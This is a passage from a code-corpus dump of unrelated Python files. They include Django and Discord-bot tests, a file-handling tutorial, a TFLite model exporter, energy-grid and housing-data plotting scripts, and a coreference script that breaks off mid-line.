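```

The tests below then cover the complementary path, where `assign_perm` has granted both object-level permissions up front.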
\n\n def test_user_seas_statatic_elements_of_page(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISSIONS FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n assign_perm(\"projects.can_modify_project\", usr, proj)\n # User gets the tag create page. This time he has the required permissions.\n self.get_tag_create(proj)\n # He sees the stable elements of the page\n header = self.browser.find_element_by_css_selector(\"h1\")\n self.assertEqual(header.text, \"Create Tag:\")\n # He sees a form to input the name of the tag.\n form = self.browser.find_element_by_css_selector(\"p\")\n self.assertEqual(form.text, \"Name:\")\n # He sees a link back to the projects tag page.\n link = self.browser.find_element_by_css_selector(\"a.link_back\")\n self.assertEqual(link.text, \"Return back to projects tag page\")\n link.click()\n self.assertEqual(self.browser.current_url,\n self.live_server_url + f\"/projects/{proj.name}/tags/\")\n\n def test_user_creates_tag(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISSIONS FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n assign_perm(\"projects.can_modify_project\", usr, proj)\n # User gets the tag create page with the required permissions.\n self.get_tag_create(proj)\n # He inputs the tag name into the form.\n self.browser.find_element_by_css_selector(\"#id_name\").send_keys(\"tag\")\n # He clicks the save button.\n self.browser.find_element_by_css_selector(\n \"input[type='submit']\").click()\n # He sees the tag created in the tag list.\n tags_list = self.browser.find_elements_by_css_selector(\"li\")\n self.assertEqual(len(tags_list), 1)\n\n def test_user_wants_to_create_tag_for_not_existing_project(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISSION FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # User gets an undefined project's create tag page. Server throws an error.\n request_url = \"/projects/random_project/tags/create/\"\n self.browser.get(self.live_server_url + request_url)\n error_header = self.browser.find_element_by_css_selector(\"h1\")\n error_text = self.browser.find_element_by_css_selector(\"p\")\n self.assertEqual(error_header.text, \"Not Found\")\n self.assertEqual(error_text.text,\n f\"The requested URL {request_url} was not found on this server.\")\n","repo_name":"Mateusz-Kirmuc/biodb_TDD","sub_path":"biodb/functional_tests/test_tag_create.py","file_name":"test_tag_create.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23897689587","text":"'''\r\n File Handling\r\nPython can be used to read and write data.\r\nIt also supports reading and writing data to files.\r\n\r\nA file is a named location on disk to store related information.\r\nIt is used to permanently store data in a non-volatile memory (eg. hard disk).\r\n\r\nGenerally, we divide files into:\r\n1) Text file\r\n2) Binary file\r\n\r\nText file: Text files contain simple text (character data).\r\nEx.
.html, .c, .cpp, .java, etc.\r\nBinary file: Binary files contain binary data which is only readable by the computer.\r\n\r\nTo perform file handling, we need to perform these steps:\r\n1) Open file\r\n2) Read / Write file\r\n3) Close file\r\n\r\nStep 1: Opening a file: ---------------------------------------\r\n\r\nTo open a file, Python has a built-in function open().\r\nIt returns a file object which is used with other functions.\r\nThe open function takes 2 arguments, the name of the file and the mode of operation.\r\nSYNTAX: f = open(filename, mode)\r\n\r\nThe default file operation is read mode\r\nf = open(\"test.txt\") # open file in current directory\r\nf = open(\"C:Python22/demo.txt\") # specifying full path\r\n\r\nStep 2: Write or read or append data: ---------------------------------------\r\nNOTE: The default mode of the file is : Read\r\n\r\nWriting to a file: the write() method is used to write a string into a file.\r\nReading from a file: the read() method is used to read data from the file.\r\n\r\nThe file object provides different read methods:\r\n1) read() - returns one big string\r\n2) readline - returns one line at a time\r\n3) readlines - returns a list of lines\r\n\r\nAppend operations: used to append the data to an existing file.\r\n\r\nStep 3: Close the file:\r\n\r\nClosing a file: close()\r\n\r\n'''\r\n\r\n'''\r\n\r\nModes for opening a file:\r\nr = Open a file for reading\r\nw = Opens a file for writing only. Overwrites the file if the file exists. \r\n If the file does not exist, it creates a new file for writing.\r\nr+ = Opens for reading and writing (cannot truncate the file)\r\nw+ = For writing and reading (can truncate the file)\r\na = Opens a file for appending at the end of the file without truncating it.\r\n Creates a new file if it does not exist.\r\nt = Open in text mode.\r\nb = Open in binary mode.\r\nx = Open for exclusive creation, failing if the file is already present.\r\n'''\r\n\r\nf = open(\"sample.txt\", \"w\") # if the file is not available then create the file and then write the data.\r\nf.write(\"Hi this is Aryan\")\r\nf.close()\r\n\r\nf = open(\"sample.txt\") # no mode is given so it opens the file in read mode by default.\r\nprint(f.read())\r\n\r\nprint(f.tell()) # this tells the current position of the cursor.\r\nprint(f.seek(5)) # moving the cursor to a specific location\r\nprint(f.read())\r\nf.close()\r\n\r\nf = open(\"sample.txt\", \"w\")\r\nf.write(\"List is a python object.\\nList is mutable.\\nModifications are allowed in list.\")\r\nf.close()\r\n\r\nf = open(\"sample.txt\")\r\nprint(f.readline()) # printing the current line\r\nf.seek(45)\r\nprint(f.readline())\r\n\r\nf.seek(0) # moving the cursor to the beginning of the file\r\nprint(f.readlines()) # print the file contents in list format\r\n\r\nprint(\"*****************************************************\")\r\n\r\nf = open(\"sampleMyfile\", \"w\")\r\nf.write(\"My name is Aryan Shisode\\nI live in Pune\")\r\nf.close()\r\n","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"File Handling (1).py","file_name":"File Handling (1).py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
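One idiom the file-handling tutorial above never mentions: the `with` statement closes the file automatically, even if an exception occurs inside the block, so the explicit close() calls become unnecessary. A short sketch reusing the tutorial's own sample.txt:

```python
# Safer variant of the open/write/close cycle shown above: a with-block
# closes the file automatically, even if an exception is raised inside it.
with open("sample.txt", "w") as f:
    f.write("List is a python object.\nList is mutable.")

with open("sample.txt") as f:   # default mode is read ("r")
    for line in f:              # iterating a file yields one line at a time
        print(line.rstrip())
```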
+{"seq_id":"20610401991","text":"import argparse\nimport json\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom nvidia_tao_tf1.core.export import keras_to_pb\nfrom nvidia_tao_tf1.core.export._quantized import check_for_quantized_layers, process_quantized_layers\nfrom nvidia_tao_tf1.cv.common.utils import CUSTOM_OBJS, model_io\n\nimport keras\nfrom keras.utils import CustomObjectScope\nimport tensorflow as tf\n\nlogger = logging.getLogger(__name__)\n\n\ndef reset_keras(fn):\n \"\"\"Simple function to define the keras decorator.\n \n This decorator clears any previously existing sessions\n and sets up a new session.\n \"\"\"\n def _fn_wrapper(*args, **kwargs):\n \"\"\"Clear the keras session.\"\"\"\n keras.backend.clear_session()\n set_keras_session()\n keras.backend.set_learning_phase(0)\n return fn(*args, **kwargs)\n return _fn_wrapper\n\n\ndef set_keras_session():\n \"\"\"Set the keras and Tensorflow sessions.\"\"\"\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n keras.backend.set_session(tf.Session(config=config))\n\n\n@reset_keras\ndef load_model(model_path: str, key=\"\"):\n \"\"\"Load the keras model.\n\n Args:\n model_path(str): Path to the model.\n key(str): The key to load the model.\n \"\"\"\n model = model_io(\n model_path,\n enc_key=key\n )\n return model\n\n\ndef resolve_path(path_string: str):\n \"\"\"Simple function to resolve paths.\n\n Args:\n path_string (str): Path to model string.\n \"\"\"\n return os.path.abspath(os.path.expanduser(path_string))\n\n\ndef save_model(model, output_path: str):\n \"\"\"Save the keras model.\n\n Args:\n model (keras.models.Model): Path to the keras model to be saved.\n output_path (str): Path to save the model.\n \"\"\"\n with CustomObjectScope(CUSTOM_OBJS):\n model.save(resolve_path(output_path))\n\n\ndef extract_model_scales(model,\n backend: str = \"onnx\"):\n \"\"\"Remove QDQ and Quantized* layers and extract the scales.\n\n Args:\n model (keras.model.Model): Model to inspect and extract scales.\n backend (str): \"onnx,uff\" model backend.\n \"\"\"\n model, tensor_scale_dict = process_quantized_layers(\n model, backend,\n calib_cache=None,\n calib_json=None)\n logger.info(\n \"Extracting tensor scale: {tensor_scale_dict}\".format(\n tensor_scale_dict=tensor_scale_dict\n )\n )\n logger.info(\"Extracting quantized scales\")\n os_handle, tmp_keras_model = tempfile.mkstemp(suffix=\".hdf5\")\n os.close(os_handle)\n with CustomObjectScope(CUSTOM_OBJS):\n model.save(tmp_keras_model)\n new_model = load_model(tmp_keras_model)\n return new_model\n\n\ndef convert_to_pb(model, output_node_names=None):\n \"\"\"Convert the model to graphdef protobuf.\n\n Args:\n model (keras.model.Model): Keras model object to serialize.\n output_node_names (dict): Name of the output nodes of the model.\n \n Returns:\n tmp_pb_file (str): Path to the protobuf file containing tf.graphDef.\n input_tensor_names (list): Names of the input tensors.\n output_tensor_names (list): Name of the output tensors.\n \"\"\"\n os_handle, tmp_pb_file = tempfile.mkstemp(\n suffix=\".pb\"\n )\n os.close(os_handle)\n input_tensor_names, out_tensor_names, _ = keras_to_pb(\n model,\n tmp_pb_file,\n None,\n custom_objects=CUSTOM_OBJS\n )\n if output_node_names:\n out_tensor_names = output_node_names\n return tmp_pb_file, input_tensor_names, out_tensor_names\n\n\ndef parse_command_line(cl_args=None):\n \"\"\"Parse command line args.\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"export_tflite\",\n description=\"Export keras models to tflite.\"\n )\n parser.add_argument(\n \"--model_file\",\n type=str,\n default=\"\",\n help=\"Path to a model file.\"\n )\n parser.add_argument(\n \"--key\",\n type=str,\n default=\"\",\n help=\"Key to load the model.\"\n )\n parser.add_argument(\n \"--output_file\",\n type=str,\n default=\"\",\n help=\"Path to the output model file.\"\n )\n 
args = vars(parser.parse_args(cl_args))\n return args\n\n\ndef main(cl_args=None):\n \"\"\"Model converter.\"\"\"\n # Convert the model\n args = parse_command_line(cl_args=cl_args)\n input_model_file = args[\"model_file\"]\n output_model_file = args[\"output_file\"]\n key = args[\"key\"]\n tensor_scale_dict = None\n if not output_model_file:\n output_model_file = f\"{os.path.splitext(input_model_file)[0]}.tflite\"\n\n model = load_model(\n input_model_file, key\n )\n quantized_model = check_for_quantized_layers(model)\n logger.info(\"Quantized model: {quantized_model}\".format(quantized_model=quantized_model))\n if quantized_model:\n model, tensor_scale_dict = extract_model_scales(\n model, backend=\"onnx\"\n )\n tensor_scale_file = os.path.join(\n os.path.dirname(output_model_file),\n \"calib_scale.json\"\n )\n with open(tensor_scale_file, \"w\") as scale_file:\n json.dump(\n tensor_scale_dict, scale_file, indent=4\n )\n graph_def_file, input_arrays, output_arrays = convert_to_pb(\n model\n )\n\n # Convert the model to TFLite.\n converter = tf.lite.TFLiteConverter.from_frozen_graph(\n graph_def_file, input_arrays, output_arrays\n )\n converter.target_spec.supported_ops = [\n tf.lite.OpsSet.TFLITE_BUILTINS, # enable TensorFlow Lite ops.\n tf.lite.OpsSet.SELECT_TF_OPS # enable TensorFlow ops.\n ]\n tflite_model = converter.convert()\n with open(output_model_file, \"wb\") as tflite_file:\n model_size = tflite_file.write(tflite_model)\n print(\n f\"Output tflite model of size {model_size} bytes \"\n f\"was written at {output_model_file}\"\n )\n\n\nif __name__ == \"__main__\":\n main(cl_args=sys.argv[1:])\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"internal/tflite/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22307528412","text":"import datetime\n\nimport pytest\nfrom dummyData.insert import mock_request\nfrom dummyData.static import *\nfrom httpx import AsyncClient\nfrom orjson import orjson\nfrom pytest_mock import MockerFixture\n\nfrom Shared.functions.helperFunctions import get_now_with_tz\nfrom Shared.networkingSchemas.destiny.lfgSystem import (\n AllLfgDeleteOutputModel,\n AllLfgOutputModel,\n LfgCreateInputModel,\n LfgOutputModel,\n LfgUpdateInputModel,\n UserAllLfgOutputModel,\n)\n\n\n@pytest.mark.asyncio\nasync def test_lfg(client: AsyncClient, mocker: MockerFixture):\n \"\"\"This tests all function in the file, because create() needs to be called first\"\"\"\n\n # =====================================================================\n # no lfg exists yet\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/all\")\n assert r.status_code == 200\n data = AllLfgOutputModel.parse_obj(r.json())\n assert data.events == []\n\n # =====================================================================\n # create\n input_model = LfgCreateInputModel(\n activity=\"Standing Around\",\n description=\"Test LFG Event\",\n start_time=datetime.datetime(day=10, month=10, year=2030, tzinfo=datetime.timezone.utc),\n max_joined_members=6,\n joined_members=[1, 2, dummy_discord_id],\n backup_members=[4],\n )\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n assert data.message_id is None\n assert data.voice_channel_id is None\n\n # 
=====================================================================\n # update\n input_model = LfgUpdateInputModel(message_id=1, voice_channel_id=2)\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/update/1\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n assert data.message_id == 1\n assert data.voice_channel_id == 2\n\n # =====================================================================\n # get all\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/all\")\n assert r.status_code == 200\n data = AllLfgOutputModel.parse_obj(r.json())\n assert len(data.events) == 1\n assert_lfg_event_ok(data=data.events[0])\n\n # =====================================================================\n # get\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/1\")\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n\n # =====================================================================\n # user get all\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/get/all\")\n assert r.status_code == 200\n data = UserAllLfgOutputModel.parse_obj(r.json())\n assert len(data.joined) == 1\n assert len(data.backup) == 0\n assert_lfg_event_ok(data=data.joined[0], test_voice_category=False)\n\n # =====================================================================\n # delete\n # this needs to re-add the event a couple of times\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id_without_perms}/delete/1\")\n assert r.status_code == 409\n assert r.json()[\"error\"] == \"NoLfgEventPermissions\"\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/delete/1\")\n assert r.status_code == 200\n\n input_model = LfgCreateInputModel(\n activity=\"Standing Around\",\n description=\"Test LFG Event\",\n start_time=datetime.datetime(day=10, month=10, year=2030, tzinfo=datetime.timezone.utc),\n max_joined_members=6,\n joined_members=[1, 2, dummy_discord_id],\n backup_members=[4],\n )\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert data.id == 2\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/1/delete/2\")\n assert r.status_code == 200\n\n # =====================================================================\n # delete all\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert data.id == 3\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/delete/all\")\n assert r.status_code == 200\n data = AllLfgDeleteOutputModel.parse_obj(r.json())\n assert data.event_ids == [3]\n\n\ndef assert_lfg_event_ok(data: LfgOutputModel, test_voice_category: bool = True):\n \"\"\"Tests all attrs of the obj\"\"\"\n\n assert data.id == 1\n assert data.guild_id == dummy_discord_guild_id\n assert data.channel_id == dummy_persistent_lfg_channel_id\n assert data.author_id == dummy_discord_id\n assert data.activity == \"Standing Around\"\n assert data.description == \"Test LFG Event\"\n assert data.start_time == datetime.datetime(day=10, month=10, year=2030, 
tzinfo=datetime.timezone.utc)\n assert data.max_joined_members == 6\n assert data.joined_members == [1, 2, dummy_discord_id]\n assert data.backup_members == [4]\n assert data.creation_time.day == get_now_with_tz().day\n if test_voice_category:\n assert data.voice_category_channel_id == dummy_persistent_lfg_voice_category_id\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/tests/endpoints/destiny/test_lfg.py","file_name":"test_lfg.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"38629630608","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 18 13:44:22 2021\n\n@author: Anders\n\"\"\"\n \n#%% European map plot\nimport pypsa, os\n#pandas package is very useful to work with imported data, time series, matrices ...\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport numpy as np\nimport cartopy.crs as ccrs\n\n#pathtest = r'C:\\Users\\ander\\OneDrive - Aarhus Universitet\\Maskiningenioer\\Kandidat\\3. semester\\PreProject Master\\Network files\\postnetworks/'\n#network_name = pathtest+'elec_s_37_lv1.0__Co2L0.1-solar+p3-dist0.5_2030.nc'\npath = r'C:/Users/ander/OneDrive - Aarhus Universitet/Maskiningenioer/Kandidat/3. semester/PreProject Master/WP4/Network_files_1hr/'\npathplot = r'C:/Users/ander/OneDrive - Aarhus Universitet/Maskiningenioer/Kandidat/3. semester/PreProject Master/WP4/Plots/map/'\nnetwork_name = path+'elec_s_37_lv1.0__H-T-H-solar+p3-dist1_2030mid.nc'\n\n\nn = pypsa.Network('elec_s_37_lv1.0__Co2L0.05-solar+p3-dist2_2030.nc')\n\n#%%\n#df=n.buses.loc[\"ES0 0 low voltage\"].rename('ES0 0')\n#df=df.to_frame().T\n#n.buses=pd.concat([df, n.buses])\n\n# This works:\n# n.generators['bus']=n.generators['bus'].replace({'ES0 0 low voltage':'ES0 0'})\n\n# This does not work :).\n#df=n.generators.loc['bus'][\"ES0 0 low voltage\"].rename('ES0 0')\n#df=df.to_frame().T\n#n.buses=pd.concat([df, n.buses])\n\n# Change bus name for solar rooftop to the same as for the other generators.\ncountries=n.generators['bus']\nfor i in countries:\n n.generators['bus']=n.generators['bus'].replace({str(i)+' low voltage':str(i)})\n\n\n\n#buselec = n.generators.assign(g = n.generators_t.p.mean()).groupby(['bus', 'carrier']).g.sum()\n#buselec = n.generators.assign(g = n.generators.p_nom.sum()).groupby(['bus', 'carrier']).g.sum()\nbuselec = n.generators.assign(g = n.generators_t.p.sum()).groupby(['bus', 'carrier']).g.sum()\n#buselec = n.generators_t.p_nom.groupby(['bus', 'carrier'])\n#buselec=buselec.drop('residential rural solar thermal', level='carrier')\n#buselec=buselec.drop('services rural solar thermal', level='carrier')\n#buselec=buselec.drop('urban rural solar thermal', level='carrier')\n#buselec=buselec.drop('urban central solar thermal', level='carrier')\n#buselec=buselec.drop('services urban decentral solar thermal', level='carrier')\n#buselec=buselec.drop('residential urban decentral solar thermal', level='carrier')\n#buselec=buselec.drop('ror', level='carrier')\n#buselec=buselec.drop('uranium', level='carrier')\n#buselec=buselec.drop('oil', level='carrier')\n#buselec=buselec.drop('gas', level='carrier')\n#buselec=buselec.drop('lignite', level='carrier')\n#buselec=buselec.drop('coal', level='carrier')\n# buselec=buselec.drop('offwind-ac', level='carrier')\n# buselec=buselec.drop('offwind-dc', level='carrier')\n# buselec=buselec.drop('offwind', level='carrier')\n# buselec=buselec.drop('solar', level='carrier')\n# 
buselec=buselec.drop('solar rooftop', level='carrier')\n\nbusline = n.storage_units.assign(g = n.storage_units_t.p.sum()).groupby(['bus', 'carrier']).g.sum().filter(like=\"hydro\")\nbuslink = -n.links.assign(g = n.links_t.p1.sum()).groupby(['bus1', 'carrier']).g.sum().filter(like=\"GT\")\nbuselec = buselec.append(busline)\nbuselec = buselec.append(buslink)\n\n#color={'onwind':'#235ebc','offwind':'#6895dd','offwind-ac':'#6895dd','offwind-dc':'#6895dd','solar':'#f9d002','solar rooftop':'#ffea80','gas':'r'}\ncolor={'onwind':'#235ebc','offwind':'#6895dd','offwind-ac':'#6895dd','offwind-dc':'#6895dd','solar':'#f9d002','solar rooftop':'#ffea80'\n ,'ror':'#78AB46','hydro':'#3B5323','PHS':'g','gas':'brown','OCGT':'brown','CCGT':'brown','uranium':'r','oil':'#B5A642','coal':'k','residential rural solar thermal':'m',\n 'services rural solar thermal':'m','urban rural solar thermal':'g','residential urban decentral solar thermal':'g','lignite':'g',\n 'urban central solar thermal':'m','nuclear':'r','services urban decentral solar thermal':'m'}\n\n\nfrom matplotlib.patches import Circle, Ellipse\nimport matplotlib.patches as mpatches\n\n\n\n#n.buses.loc[\"ES0 0 low voltage\"]\n#n.buses.loc[\"ES0 0 low voltage\",[\"x\",\"y\"]] = [-3.43431,40.6009]\n#n.buses.loc[\"ES0 0 low voltage\",['carrier']] = ['AC']\n\n#n.buses.loc[\"ES0 0 low voltage\",['Name']] = ['ES0 0'] \n \n#Filtering of the links that are DC Links\nn.links=n.links.loc[n.links['carrier'] == 'DC']\n \n \nfig, ax = plt.subplots(subplot_kw={\"projection\":ccrs.PlateCarree()})\nn.plot(bus_sizes=buselec/8e7, \n bus_colors=color,\n color_geomap=True,\n boundaries=([-12,30,36,65]),\n #boundaries=([-10.2, 29, 35, 64]),\n branch_components=[\"Link\",\"Line\"],# [\"Link\",\"Line\"] this one decides if we want the links \n ax=ax)\n\n#ax.set_title('Produced energy by wind and solar')\ngas_patch = mpatches.Patch(color='Brown', label=' Gas')\nhydro_patch = mpatches.Patch(color='#3B5323', label=' Hydro')\nror_patch = mpatches.Patch(color='#78AB46', label=' Ror')\nonwind_patch = mpatches.Patch(color='#235ebc', label=' Onwind')\noffwind_patch = mpatches.Patch(color='#6895dd', label=' Offwind')\nsolar_patch = mpatches.Patch(color='#f9d002', label=' Solar Utility')\nsolarroof_patch = mpatches.Patch(color='#ffea80', label=' Solar Rooftop')\n#ror_patch = mpatches.Patch(color='#78AB46', label=' Run-of-river')\nax.legend(handles=[onwind_patch,offwind_patch,solar_patch,solarroof_patch,gas_patch,hydro_patch,ror_patch],\n loc=\"lower right\", bbox_to_anchor=(1.32, 0.5),#bbox_to_anchor=(0.01, 0.79),\n framealpha=0, #color of the background of the legend\n handletextpad=0., columnspacing=0.5, ncol=1, title=None)\n\n\npath = r'C:\\Users\\Mads Jorgensen\\OneDrive - Aarhus Universitet\\Dokumenter\\3. 
Semester Kandidat\\01_PreProject\\LateX\\Pictures'\nname = r'\\02_map_dist2'\nplt.savefig(path+name,dpi=300, bbox_inches='tight')\n\n\n#%% Using the correct plot with transmission line expansion\n\nloading = (n.lines_t.p0.abs().mean().sort_index() / (n.lines.s_nom_opt*n.lines.s_max_pu).sort_index()).fillna(0.)\n\nfig,ax = plt.subplots(subplot_kw = {\"projection\": ccrs.PlateCarree()})\n\nn.plot(bus_sizes=buselec/8e7, \n bus_colors=color,\n ax=ax,\n #bus_colors='gray',\n branch_components=[\"Line\"],\n line_widths=n.lines.s_nom_opt/9e3,\n line_colors='purple',\n line_cmap=plt.cm.viridis,\n color_geomap=True,\n boundaries=([-12,30,36,65]))\n #bus_sizes=0.1)\n#ax.set_title('Produced energy by wind and solar')\ngas_patch = mpatches.Patch(color='Brown', label=' Gas')\nhydro_patch = mpatches.Patch(color='#3B5323', label=' Hydro')\nror_patch = mpatches.Patch(color='#78AB46', label=' Ror')\nonwind_patch = mpatches.Patch(color='#235ebc', label=' Onwind')\noffwind_patch = mpatches.Patch(color='#6895dd', label=' Offwind')\nsolar_patch = mpatches.Patch(color='#f9d002', label=' Solar Utility')\nsolarroof_patch = mpatches.Patch(color='#ffea80', label=' Solar Rooftop')\n#ror_patch = mpatches.Patch(color='#78AB46', label=' Run-of-river')\nax.legend(handles=[onwind_patch,offwind_patch,solar_patch,solarroof_patch,gas_patch,hydro_patch,ror_patch],\n loc=\"lower right\", bbox_to_anchor=(1.32, 0.5),#bbox_to_anchor=(0.01, 0.79),\n framealpha=0, #color of the background of the legend\n handletextpad=0., columnspacing=0.5, ncol=1, title=None)\n\npath = r'C:\\Users\\Mads Jorgensen\\OneDrive - Aarhus Universitet\\Dokumenter\\3. Semester Kandidat\\01_PreProject\\LateX\\Pictures'\nname = r'\\02_map_dist2'\nplt.savefig(path+name,dpi=300, bbox_inches='tight')\n\n","repo_name":"MadsJoergensen/PreProject_2021","sub_path":"europemapplot.py","file_name":"europemapplot.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6604403242","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nfig, ax = plt.subplots()\r\n\r\n# Drawing the tables (as rectangles)\r\ntable1 = patches.Rectangle((0.2, 0.2), 0.2, 0.2, fill=None)\r\ntable2 = patches.Rectangle((0.6, 0.2), 0.2, 0.2, fill=None)\r\n\r\n# Adding the tables to the plot\r\nax.add_patch(table1)\r\nax.add_patch(table2)\r\n\r\n# Drawing lines between the tables and from table 2 to a point in the surrounding area\r\nplt.plot([0.3, 0.7], [0.3, 0.3], 'k-') # line between tables\r\nplt.plot([0.7, 0.7], [0.4, 0.8], 'k-') # line from table 2 to surrounding area\r\n\r\n# Labeling the tables\r\nplt.text(0.3, 0.15, '1', horizontalalignment='center')\r\nplt.text(0.7, 0.15, '2', horizontalalignment='center')\r\n\r\n# Adjusting the limits and aspect ratio of the plot to ensure that everything fits\r\nax.set_xlim(0, 1)\r\nax.set_ylim(0, 1)\r\nax.set_aspect('equal')\r\n\r\n# Displaying the plot\r\nplt.show()\r\n","repo_name":"roomaustin/Tables","sub_path":"tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"855429452","text":"from mlxtend.plotting import scatterplotmatrix\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"../../data/housing.data.txt\", header=None, sep=\"\\s+\")\n\n df.columns = [\n \"CRIM\",\n \"ZN\",\n \"INDUS\",\n \"CHAS\",\n \"NOX\",\n \"RM\",\n 
\"AGE\",\n \"DIS\",\n \"RAD\",\n \"TAX\",\n \"PTRATIO\",\n \"B\",\n \"LSTAT\",\n \"MEDV\",\n ]\n\n cols = [\"LSTAT\", \"INDUS\", \"NOX\", \"RM\", \"MEDV\"]\n\n scatterplotmatrix(df[cols].values, figsize=(10, 8), names=cols, alpha=0.5)\n plt.tight_layout()\n plt.savefig(\"../../figure/test_housing_eda.png\")\n","repo_name":"suzshiro1024/machine_learning_3rd","sub_path":"src/chapter10/test_housing_eda.py","file_name":"test_housing_eda.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35443559744","text":"def shopping_list(budget,**kwargs):\n budget_calc = budget\n finished_orders = []\n if budget > 99:\n\n for products in kwargs.items():\n name = products[0]\n price = products[1][0]\n qty = products[1][1]\n current_order_total = price * qty\n if current_order_total <= budget_calc:\n if len(finished_orders) < 5:\n budget_calc -= current_order_total\n shopping_line_to_add = f\"You bought {name} for {current_order_total:.2f} leva.\"\n finished_orders.append(shopping_line_to_add)\n else:\n break\n return \"\\n\".join(x for x in finished_orders)\n\n else:\n return \"You do not have enough budget.\"\n\n\n\n\n\n\n\n\n# print(shopping_list(100,\n# microwave=(70, 2),\n# skirts=(15, 4),\n# coffee=(1.50, 10),\n# ))\n\n# print(shopping_list(20,\n# jeans=(19.99, 1),\n# ))\n\nprint(shopping_list(104,\n cola=(1.20, 2),\n candies=(0.25, 15),\n bread=(1.80, 1),\n pie=(10.50, 5),\n tomatoes=(4.20, 1),\n milk=(2.50, 2),\n juice=(2, 3),\n eggs=(3, 1),\n ))\n","repo_name":"maon0002/Python-Advanced-January-2023","sub_path":"past_exams/03_shopping_list.py","file_name":"03_shopping_list.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75247207848","text":"from datasets import load_dataset\nimport os\nimport argparse\nfrom fastcoref import FCoref\nfrom data_utils import loadJsonl\nimport json\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gpu\", \n type=int, \n default=0)\n # data path\n parser.add_argument(\"--data_dir\",\n type=str,\n default=\"../../data/cross_doc_role_extraction/\")\n \n parser.add_argument(\"--output_dir\",\n type=str,\n default=\"../../data/cross_doc_role_extraction/coref_clusters\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n os.makedirs(args.output_dir, exist_ok=True)\n coref_model = FCoref(device=f'cuda:{args.gpu}')\n # Load the data\n train_data = loadJsonl(os.path.join(args.data_dir, \"train.jsonl\"))\n dev_data = loadJsonl(os.path.join(args.data_dir, \"dev.jsonl\"))\n test_data = loadJsonl(os.path.join(args.data_dir, \"test.jsonl\"))\n # Get the unique contexts\n unique_context_tuples = []\n for instance in train_data + dev_data + test_data:\n unique_context_tuples.append((instance['instance_id'],\n {'report_doctext': instance['report_dict']['doctext'],\n 'source_doctext': instance['source_dict']['doctext']})),\n \n print(f\"Unique contexts for coref: {len(unique_context_tuples)}\")\n unique_id_to_source_coref_clusters = {}\n ########################################################\n ### Report Coref Clusters\n ########################################################\n # Get the coref chains for report\n coref_preds_report = coref_model.predict(\n texts=[doctext_dict['report_doctext'] for _, doctext_dict in \n unique_context_tuples]\n )\n # For report\n for unique_id, coref_pred_report in zip([instance_id for 
